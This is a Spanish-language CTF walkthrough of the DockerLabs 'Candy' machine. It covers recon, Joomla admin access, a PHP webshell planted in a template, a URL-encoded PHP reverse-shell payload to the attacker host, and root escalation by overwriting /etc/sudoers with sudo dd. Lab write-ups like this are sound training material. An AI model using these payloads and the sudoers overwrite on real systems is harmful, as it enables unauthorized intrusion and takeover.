Candy

Introducción

Este artículo documenta la resolución de la máquina virtual Candy, desarrollada por Luisillo_o y clasificada con un nivel de dificultad fácil. A través de un enfoque sistemático, se detallan las fases de reconocimiento, explotación y escalada de privilegios, empleando herramientas comunes en escenarios de captura la bandera (CTF).

Información de la Máquina Virtual

• Nombre: Candy
• Autor: Luisillo_o
• Dificultad: Fácil
• Fecha de creación: 29/08/2024

Paso 0: Instalación y Despliegue

1. Descargamos la máquina desde DockerLabs.

2. Descomprimimos el archivo:

   unzip Candy.zip

3. Ejecutamos el script de despliegue:

   sudo bash auto_deplo.sh Candy.tar

Paso 1: Reconocimiento

Identificación de la IP

Al iniciarse la máquina, se muestra directamente su dirección IP, por lo que no es necesario realizar un escaneo ARP.

Preparamos el entorno de trabajo:

mkdir Candy
cd Candy
mkt  # Crea: content, exploits, nmap, scripts

Escaneo de Puertos

Ejecutamos un escaneo completo con nmap:

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

extractPorts allPorts

Enumeración Web

Detectamos directorios y archivos mediante gobuster:

gobuster dir -u http://172.17.0.2/ \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \
  -x php,html,txt,js -t 200

Entre los hallazgos más relevantes:

• index.html: Página principal tipo blog, actualmente sin artículos.

  

• README.txt y LICENSE.txt: Archivos por defecto de Joomla.

• robots.txt: Contiene directorios y una pista relevante.

  

• un_caramelo: Archivo adicional que repite la pista encontrada en robots.txt.

  

• administrator: Panel de administración de Joomla.

  

Paso 2: Explotación

Una de las pistas clave parece ser una cadena codificada en Base64. La decodificamos:

echo "c2FubHVpczEyMzQ1" | base64 -d

Esto nos proporciona una posible contraseña para iniciar sesión en el panel de administración:

Ya dentro, accedemos a la sección de Templates, editamos el index.php del tema activo y agregamos una webshell básica:

system($_GET['shadow']);

Comprobamos la ejecución remota:

http://172.17.0.2/index.php?shadow=id

Reverse Shell

1. Abrimos el puerto en nuestra máquina:

   nc -lvnp 443

2. Enviamos el siguiente payload (URL-encodeado) a través del parámetro shadow:

   php%20-r%20%27%24sock%3Dfsockopen%28%22172.17.0.1%22%2C443%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

Esto nos otorga una shell como www-data:

Paso 3: Escalada de Privilegios

Con www-data no encontramos vectores inmediatos de escalada. Sin embargo, en /home encontramos un usuario llamado luisillo. Buscamos archivos asociados:

find / -user luisillo 2>/dev/null

Uno de los archivos accesibles es:

/var/backups/hidden/otrro_caramelo.txt

Este contiene credenciales en texto plano:

Con estas credenciales, accedemos vía SSH como luisillo. Al ejecutar sudo -l vemos que puede ejecutar dd como root:

Escalada mediante dd

La utilidad dd permite escribir directamente sobre archivos del sistema. Usamos esta capacidad para modificar /etc/sudoers y otorgar privilegios a luisillo.

Ejemplo basado en GTFOBins:

echo 'luisillo ALL=(ALL) NOPASSWD:ALL' | sudo dd of=/etc/sudoers

Luego, escalamos a superusuario con:

sudo su

Conclusión

La máquina Candy plantea una ruta clara pero efectiva: reconocimiento web básico, explotación de Joomla mediante inyección en templates y escalada mediante manipulación de archivos sensibles con dd. Las pistas diseminadas como “caramelos” hacen honor al nombre de la máquina y ofrecen una experiencia entretenida y educativa.